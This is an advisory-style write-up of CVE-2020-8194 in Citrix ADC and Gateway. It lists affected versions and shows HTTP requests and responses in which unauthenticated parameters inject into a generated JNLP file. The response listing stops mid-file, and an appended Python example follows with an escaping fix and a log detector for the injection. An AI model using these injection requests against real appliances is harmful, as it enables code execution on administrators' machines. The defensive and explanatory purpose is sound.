(CVE-2020-8194) Citrix Unauthenticated Access Leading to Arbitrary Code Execution

1. Vulnerability Overview

Citrix ADC and Citrix NetScaler Gateway contain a code injection vulnerability. An unauthenticated remote attacker can exploit it to create a malicious file which, if executed by a victim on the management network, allows the attacker to run arbitrary code in that user's context.

2. Affected Versions

Citrix ADC and Citrix Gateway: < 13.0-58.30

Citrix ADC and NetScaler Gateway: < 12.1-57.18

Citrix ADC and NetScaler Gateway: < 12.0-63.21

Citrix ADC and NetScaler Gateway: < 11.1-64.14

NetScaler ADC and NetScaler Gateway: < 10.5-70.18

Citrix SD-WAN WANOP: < 11.1.1a

Citrix SD-WAN WANOP: < 11.0.3d

Citrix SD-WAN WANOP: < 10.2.7

Citrix Gateway Plug-in for Linux: < 1.0.0.137

3. Reproduction

A Java Web Start file is generated through the following URL, and this URL requires no authentication:

GET /menu/guiw?nsbrand=1&protocol=2&id=3&nsvpx=4 HTTP/1.1
Host: www.0-sec.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: startupapp=st
Upgrade-Insecure-Requests: 1

Citrix then returns a generated file to the user, and that file is permitted to connect to the Citrix appliance:

HTTP/1.1 200 OK
Date: Tue, 21 Jan 2020 20:32:44 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=10
X-XSS-Protection: 1; mode=block
Content-Length: 2320
Connection: close
Content-Type: application/x-java-jnlp-file

<jnlp codebase="2://citrix.local" href="/menu/guiw?nsbrand=1&protocol=2&id=3&nsvpx=4">

<information>
<title>GUI citrix.local</title>
<vendor>Citrix Systems, Inc.</vendor>
<homepage href="help/im/help.htm"/>
<description>Configuration Utility - Web Start Client</description>
<icon href="admin_ui/common/images/guiicon.gif"/>
<shortcut online="true">
<desktop/>
</shortcut>
</information>

<security>
<all-permissions/>
</security>

<resources>
<j2se version="1.6+" initial-heap-size="256M" max-heap-size="256M" />
<jar href="/admin_ui/php/application/views/applets/gui.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_images.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view1.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view2.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view3.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view4.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view5.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view6.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view7.jar"/>
<jar href="/admin_ui/php/application/views/applets/guicommon.jar"/>
<jar href="/admin_ui/php/application/views/applets/ns.jar"/>
<jar href="/admin_ui/php/application/views/applets/jnlp.jar"/>
<jar href="/admin_ui/php/application/views/applets/sinetfactory.jar"/>
<jar href="/admin_ui/php/application/views/applets/sslava.jar"/>
<jar href="/admin_ui/php/application/views/applets/pixl.jar"/>
<jar href="/admin_ui/php/application/views/applets/looks.jar"/>
<jar href="/admin_ui/php/application/views/applets/l2fprod-common-tasks.jar"/>
<jar href="/admin_ui/php/application/views/applets/commons-codec.jar"/>
<jar href="/admin_ui/php/application/views/applets/java40.jar"/>
<jar href="/admin_ui/php/application/views/applets/prefuse.jar"/>
<jar href="/admin_ui/php/application/views/applets/gson.jar"/>
</resources>

<application-desc main-class="ns.im.Gui">
<argument>-D</argument>
<argument>0</argument>
<argument>-WS</argument>
<argument>0</argument>
<argument>-codebase</argument>
<argument>2://citrix.local</argument>
<argument>-ns4</argument>
<argument>1</argument>
<argument>-ns10</argument>
<argument>4</argument>
</application-desc>
</jnlp>

As shown above, the user-supplied input is reflected directly into the output, so we can try to execute malicious code:

GET /menu/guiw?nsbrand=HENKA&protocol=wiki.0-sec.org">&id=HENKC&nsvpx=phpinfo HTTP/1.1
Host: www.0-sec.org

Response:

HTTP/1.1 200 OK
Date: Sun, 26 Jan 2020 12:52:01 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=10
X-XSS-Protection: 1; mode=block
Content-Length: 2398
Connection: close
Content-Type: application/x-java-jnlp-file

<jnlp codebase="wiki.0-sec.org">://www.0-sec.org" href="/menu/guiw?nsbrand=HENKA&protocol=wiki.0-sec.org">&id=HENKC&nsvpx=phpinfo">

<information>
<title>GUI citrix.local</title>
<vendor>Citrix Systems, Inc.</vendor>
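As an added example (not code from this write-up or from Citrix), the Python below shows why the reflected value above breaks the JNLP and how a defender handles it: the raw-interpolation pattern the response demonstrates sits beside a version that escapes the codebase attribute properly, and a small detector flags access-log request lines to /menu/guiw whose reflected parameters carry attribute-breaking characters. The host names and log lines are constructed.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit
from xml.sax.saxutils import quoteattr

def codebase_attr_unsafe(protocol: str, host: str) -> str:
    """Reflection pattern from the write-up: raw interpolation, so a '"' in the value closes the attribute."""
    return f'codebase="{protocol}://{host}"'

def codebase_attr_safe(protocol: str, host: str) -> str:
    """quoteattr() escapes & < > and quotes, so the value always stays inside the attribute."""
    return "codebase=" + quoteattr(f"{protocol}://{host}")

def parse_codebase(attr: str):
    """Parse a minimal <jnlp .../> carrying the attribute; None if it is no longer well-formed XML."""
    try:
        return ET.fromstring(f"<jnlp {attr}/>").get("codebase")
    except ET.ParseError:
        return None

# The four parameters reflected into the JNLP. Legitimate values are short numerics
# or names, so attribute-breaking characters in them are a strong signal.
WATCHED_PARAMS = ("nsbrand", "protocol", "id", "nsvpx")
SUSPICIOUS = re.compile(r'["<>&]')

def is_suspicious_guiw_request(request_line: str) -> bool:
    """True for a request to /menu/guiw with '"', '<', '>' or '&' in any reflected parameter (URL-decoded)."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    url = urlsplit(parts[1])
    if url.path != "/menu/guiw":
        return False
    params = parse_qs(url.query, keep_blank_values=True)
    return any(SUSPICIOUS.search(v) for name in WATCHED_PARAMS for v in params.get(name, []))

def flagged_requests(lines):
    return [line for line in lines if is_suspicious_guiw_request(line)]

SAMPLE_LOG = [  # constructed request lines; hosts are placeholders, not real targets
    "GET /menu/guiw?nsbrand=1&protocol=2&id=3&nsvpx=4 HTTP/1.1",
    'GET /menu/guiw?nsbrand=HENKA&protocol=wiki.example">&id=HENKC&nsvpx=x HTTP/1.1',
    "GET /menu/guiw?nsbrand=1&protocol=%22%3E&id=3&nsvpx=4 HTTP/1.1",
    "GET /vpn/index.html HTTP/1.1",
]

if __name__ == "__main__":
    print(parse_codebase(codebase_attr_unsafe('wiki.example">', "ns.example")))  # None
    print(parse_codebase(codebase_attr_safe('wiki.example">', "ns.example")))
    print(flagged_requests(SAMPLE_LOG))
```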